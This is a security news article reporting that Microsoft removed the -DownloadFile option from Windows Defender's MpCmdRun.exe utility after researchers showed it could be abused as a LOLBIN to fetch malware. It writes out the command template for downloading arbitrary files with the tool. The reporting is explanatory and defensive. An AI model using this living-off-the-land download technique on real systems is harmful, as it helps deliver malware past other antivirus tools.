Microsoft removed the file download command in Windows Defender Antivirus
Microsoft removed the ability to download files using Windows Defender after demonstrating how attackers can use this functionality to deliver malware to a computer.
We reported some time ago how Microsoft, for unclear reasons, covertly added the ability to download files using Microsoft Defender.
Following this, the cybersecurity research community expressed concern that Microsoft now allows Windows 10 antivirus to be used as LOLBINs (legitimate OS files that can be used for malicious purposes).
“With this new feature, Microsoft Defender is now part of the long list of Windows programs that can be abused by local attackers”, – wrote BleepingComputer journalists.
To download files, users can use the antivirus service command line utility (MpCmdRun.exe) with the -DownloadFile argument, for example:
MpCmdRun.exe -DownloadFile -url [URL] -path [path to save file]
In BleepingComputer’s tests, the specialists were able to download any files, including ransomware, to the systems.
If Windows Defender is active, it will quickly detect the threat, but other antivirus software can ignore the download.
Answering an official request from BleepingComputer, Microsoft refused to explain why the functionality was added at all.
On September 17, Microsoft updated the antimalware client to version 4.18.2009.2-0 and again changed the functionality of the MpCmdRun.exe utility.
This time the company removed the ability to download files using the command line tool MpCmdRun.exe.
Users who try to download the file using MpCmdRun.exe will receive an error:
CmdTool: Invalid command line argument
The -DownloadFile command has now been removed from the utility help screen.
Cybercriminals could use all the tools available to them to their advantage, especially those that could be resolved automatically, such as Windows binaries.
LOLBIN attacks are quite real.
“For example, LOLBINs were used by the TA505 team to carry out attacks using ransomware and other types of malware”, – said information security experts.
The removal of the boot option from Windows Defender is good news, as attackers have no additional opportunity to compromise user systems.